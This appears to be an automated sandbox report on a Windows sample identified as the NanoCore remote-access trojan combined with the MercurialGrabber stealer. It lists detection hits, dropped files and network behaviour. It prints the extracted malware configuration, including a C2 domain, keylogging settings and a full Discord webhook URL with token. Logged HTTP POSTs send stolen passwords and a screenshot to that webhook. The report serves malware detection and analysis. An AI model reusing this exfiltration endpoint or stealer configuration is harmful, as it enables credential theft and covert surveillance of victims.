Windows Analysis Report 4Y85lSOUJ0.exe

Overview

General Information

Sample Name:	4Y85lSOUJ0.exe
Analysis ID:	553230
MD5:	4f439877b84b51b8caa48ae81e1d2363
SHA1:	defde1263c0ca2d604226cff86e4045a28650ab4
SHA256:	b05b740309562ab6160cc3eb8ed2f0dd839d53c6c71f67bf40aeeb3f580eeb0a
Tags:	exeNanoCoreRAT
Infos:
Most interesting Screenshot:

Detection

Nanocore MercurialGrabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Yara detected MercurialGrabber

Detected Nanocore Rat

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Yara detected Nanocore RAT

Machine Learning detection for sample

May check the online IP address of the machine

.NET source code contains potential unpacker

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the product ID of Windows

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains capabilities to detect virtual machines

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp	Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "e5633be0-23ed-438f-a28c-ab363fff", "Group": "Lol ve Valo", "Domain1": "alpay.germanywestcentral.cloudapp.azure.com", "Domain2": "", "Port": 6000, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 4985, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "fcff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "alpay.germanywestcentral.cloudapp.azure.com"}
Source: 5.2.output.exe.300000.0.unpack	Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7"}

Multi AV Scanner detection for submitted file

Source: 4Y85lSOUJ0.exe	Virustotal: Detection: 73%			Perma Link
Source: 4Y85lSOUJ0.exe	ReversingLabs: Detection: 82%

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Antivirus / Scanner detection for submitted sample

Source: 4Y85lSOUJ0.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\ProgramData\output.exe	Avira: detection malicious, Label: HEUR/AGEN.1137455
Source: C:\ProgramData\nano.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Metadefender: Detection: 85%	Perma Link
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	ReversingLabs: Detection: 96%
Source: C:\ProgramData\nano.exe	Metadefender: Detection: 85%	Perma Link
Source: C:\ProgramData\nano.exe	ReversingLabs: Detection: 96%
Source: C:\ProgramData\output.exe	Metadefender: Detection: 51%	Perma Link
Source: C:\ProgramData\output.exe	ReversingLabs: Detection: 85%

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

Machine Learning detection for sample

Source: 4Y85lSOUJ0.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\output.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\nano.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.nano.exe.5c40000.7.unpack	Avira: Label: TR/NanoCore.fadte
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.2.nano.exe.a80000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 2.0.nano.exe.a80000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Uses 32bit PE files

Source: 4Y85lSOUJ0.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49748 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49750 version: TLS 1.0

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: 4Y85lSOUJ0.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: indows\mscorlib.pdbpdblib.pdb source: nano.exe, 00000002.00000002.552327927.0000000002DF5000.00000004.00000040.sdmp

Networking:

May check the online IP address of the machine

Source: C:\ProgramData\output.exe

DNS query: name: ip-api.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: alpay.germanywestcentral.cloudapp.azure.com
Source: Malware configuration extractor	URLs: https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET //json/84.17.52.18 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49748 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49750 version: TLS 1.0

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: multipart/form-data; boundary=----------3cde43b36e5043cd8b731216050e2461User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0Host: discord.comContent-Length: 662Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: multipart/form-data; boundary=----------69ea6f20e22e45fdbf9ff26e6e4a8634User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0Host: discord.comContent-Length: 106574Expect: 100-continue

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: output.exe, 00000005.00000002.303632459.000000001B473000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.
Source: output.exe, 00000005.00000002.303632459.000000001B473000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: http://discord.com
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: http://ip-api.com//json/
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com//json/84.17.52.18
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.comx
Source: output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp	String found in binary or memory: http://ip4.seeip.org
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/923954670580420641/931537240771944498/passwords.txt
Source: output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302895001.000000000268F000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/923954670580420641/931537246346162207/Capture.jpg
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cp
Source: output.exe, 00000005.00000002.302937012.000000000269F000.00000004.00000001.sdmp, output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com8
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: https://discord.comx
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://discordapp.com/api/v8/users/
Source: output.exe.0.dr	String found in binary or memory: https://i.imgur.com/vgxBhmx.png
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp	String found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://ip4.seeip.org
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.org/
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.orgx
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://media.discordapp.net/attachments/923954670580420641/931537240771944498/passwords.txt
Source: output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302895001.000000000268F000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://media.discordapp.net/attachments/923954670580420641/931537246346162207/Capture.jpg
Source: output.exe, 00000005.00000002.302937012.000000000269F000.00000004.00000001.sdmp, output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302650273.0000000002610000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302902345.0000000002693000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302925247.000000000269B000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://www.countryflags.io/
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: https://www.countryflags.io/CH/flat/48.png

Source: unknown

HTTP traffic detected: POST /api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cprxylpPM2dUs4LrksljK7 HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip4.seeip.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //json/84.17.52.18 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: nano.exe, 00000002.00000002.551067632.000000000122A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Installs a raw input device (often for capturing keystrokes)

Source: nano.exe, 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

System Summary:

Malicious sample detected (through community Yara rule)

Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
